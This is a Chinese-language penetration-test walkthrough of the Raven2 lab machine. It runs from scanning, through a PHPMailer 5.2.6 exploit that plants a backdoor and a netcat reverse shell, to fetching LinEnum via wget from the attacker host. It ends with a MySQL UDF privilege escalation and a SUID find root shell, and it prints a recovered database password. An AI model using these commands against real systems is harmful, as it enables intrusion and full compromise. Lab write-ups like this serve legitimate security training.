文章目录
Raven2 渗透测试
信息收集
查看存活主机
arp-scan -l
data:image/s3,"s3://crabby-images/69686/69686993b253d75eef84cbe381ee7e4829a8f495" alt=""
找到目标主机。
扫描目标主机上的端口、状态、服务类型、版本信息
nmap -A 192.168.160.47
data:image/s3,"s3://crabby-images/01bf8/01bf8841b818b9012007ccf292b13423fdbcbea9" alt=""
目标开放了 22、80、111 端口
访问一下80端口,并查看它的组件:
data:image/s3,"s3://crabby-images/94c3f/94c3faa18e5e05c9737124f6095842fd38fd6f8d" alt=""
没有发现什么有用的信息
对目标目录进行扫描
sudo dirsearch -u 192.168.160.47 -i 200
data:image/s3,"s3://crabby-images/38b8f/38b8f0179c4939ee13f11021dd47667b24d7af5b" alt=""
也可以使用dirb http://192.168.160.47
进行目录扫描:
data:image/s3,"s3://crabby-images/c8a04/c8a0475a5215b44793c49439cb1e460fc593ca5b" alt=""
在/vendor/PATH
中找到了flag1
data:image/s3,"s3://crabby-images/7f56f/7f56f7a657b0b460b974174c7ce3f09c435b2c0c" alt=""
拿到了flag1:
data:image/s3,"s3://crabby-images/10ddb/10ddb0171a750f3305999fd15636bafe44b3793f" alt=""
在/vendor/VERSION
中有一个版本号,这可能是一个软件版本号:
data:image/s3,"s3://crabby-images/b5796/b579672bcc7aa3e92aee7e5e238d5a0c7666f9ec" alt=""
再看 /vendor 目录下,还有几个文件名含有 phpmailer 的文件,如PHPMailerAutoload.php ,可确定 5.2.6 是 PHPMailer 的版本号。
于是使用漏洞利用搜索工具 searchsploit 在 exploit-db 中搜索 PHPMailer 相关的 exp。
data:image/s3,"s3://crabby-images/8fa92/8fa92c5d0d8f8ec36eb4f1d2eb58cadbf58add0d" alt=""
选用40974.py.使用cp命令将py文件复制到桌面,并且使用vim编辑器打开
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /home/kali/Desktop
vim 40974.py
data:image/s3,"s3://crabby-images/6e2a1/6e2a17a7d1f99e3942f46d4e8d42755b3da4e9fe" alt=""
data:image/s3,"s3://crabby-images/5b0b6/5b0b669192a0542b7c91058b8d4f9b9b2faca4d4" alt=""
运行python代码
sh
python 40974.py
data:image/s3,"s3://crabby-images/acb0f/acb0f10886cdda8f8c7d9bfa06e317914c1d905e" alt=""
浏览器访问http://192.168.160.47/contact.php生成后门文件
data:image/s3,"s3://crabby-images/8e98f/8e98f5aed3b9929c22724ffd3e6c25a71f75c93b" alt=""
用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell
nc -lvnp 4444
data:image/s3,"s3://crabby-images/dc616/dc616892cd2299e97da3ba3afa9e4fa22fb0cbef" alt=""
使用python获取pty得到交互式的shell
sh
python -c 'import pty;pty.spawn("/bin/bash")'
data:image/s3,"s3://crabby-images/5961a/5961aef6adc384cce15c555d8cbf61b1d0488266" alt=""
在根目录下全局搜索flag
sh
find / -name *flag*
data:image/s3,"s3://crabby-images/66ebd/66ebd711b03c3084898137b534ca89708afc4e73" alt=""
看到了flag2和flag3.png
查看flag2:
data:image/s3,"s3://crabby-images/84a13/84a1317e34ed36ccfd230b54e5c804220e7c3678" alt=""
查看flag3:
data:image/s3,"s3://crabby-images/cacf6/cacf653fbf112e89a4e21e2a942bbf7a3ab1d5d2" alt=""
查看wordpress
的配置文件 /var/www/html/wordpress/wp-config.php
data:image/s3,"s3://crabby-images/19d66/19d66e8abc5e89855a78e83441268416a0650c76" alt=""
data:image/s3,"s3://crabby-images/2901d/2901d987fd53f4ede1f16ef1dea8dc708e718aaf" alt=""
得到数据库账号:root ,数据库密码:R@v3nSecurity
提权
在kali终端下载枚举漏洞工具LinEnum
sh
sudo proxychains git clone https://github.com/rebootuser/LinEnum.git
里面有一个LinEnum.sh
可执行文件
data:image/s3,"s3://crabby-images/cdd86/cdd865f9b5d181462bfc9c831f1e193131260eda" alt=""
用python搭建一个简单的服务器来把文件下载到靶机里面
shell
python -m http.server 7788
data:image/s3,"s3://crabby-images/3c94d/3c94d058f665429a6d8ef98554c77154176bfc1a" alt=""
在靶机上使用wget下载
sh
wget http://192.168.160.12:7788/LinEnum.sh
data:image/s3,"s3://crabby-images/2af84/2af84ea5c581d4d3b42e4e320038a961f2eecfef" alt=""
查看到没有执行权限
data:image/s3,"s3://crabby-images/d1976/d1976186b6e006b36c1580a78a97015dde1fab3c" alt=""
需要提权,chmod修改权限后,再./LinEnum.sh执行
sh
chmod +x LinEnum.sh
data:image/s3,"s3://crabby-images/21c5c/21c5cfabedaa6db6563781fbfaf2c986dc4187ea" alt=""
执行:
data:image/s3,"s3://crabby-images/72334/723346000eedab615d0b73e0134a68514e006c06" alt=""
查到了数据库的版本信息
data:image/s3,"s3://crabby-images/4afd0/4afd021812416234a3f01f78676ccc20c3199875" alt=""
数据库版本为5.5.60
UDF脚本
利用脚本
data:image/s3,"s3://crabby-images/9677d/9677d138a726bcb3d2aa66ecadf5a2faa9adb035" alt=""
searchsploit -m 1518
cp /usr/share/exploitdb/exploits/linux/local/1518.c ./1518.c
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc
将1518.so 文件上传到/tmp 目录下
data:image/s3,"s3://crabby-images/f4ada/f4ada0a946d72e47e42e68825e0a19704c810529" alt=""
MySQL提权
sh
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile
create function do_system returns integer soname
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
www-data@Raven:/tmp$ mysql -uroot -pR@v3nSecurity
mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/tmp/1518.so'));
insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.01 sec)
mysql> create function do_system returns integer soname 'raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------------+----------+
| name | ret | dl | type |
+-----------+-----+---------------+----------+
| do_system | 2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)
mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
| 0 |
+--------------------------------------+
1 row in set (0.01 sec)
data:image/s3,"s3://crabby-images/1a187/1a1870722836ec083afe72549733f23f96093d44" alt=""
此时,/usr/bin/find 就具备了SUID 权限
SUID提权
sh
find 15* -exec '/bin/sh' \;
data:image/s3,"s3://crabby-images/04cb4/04cb4f38c0e482c98048590746554fdbbe8d66db" alt=""
data:image/s3,"s3://crabby-images/69d19/69d197f1315473b6434214870f6cad72f466e32e" alt=""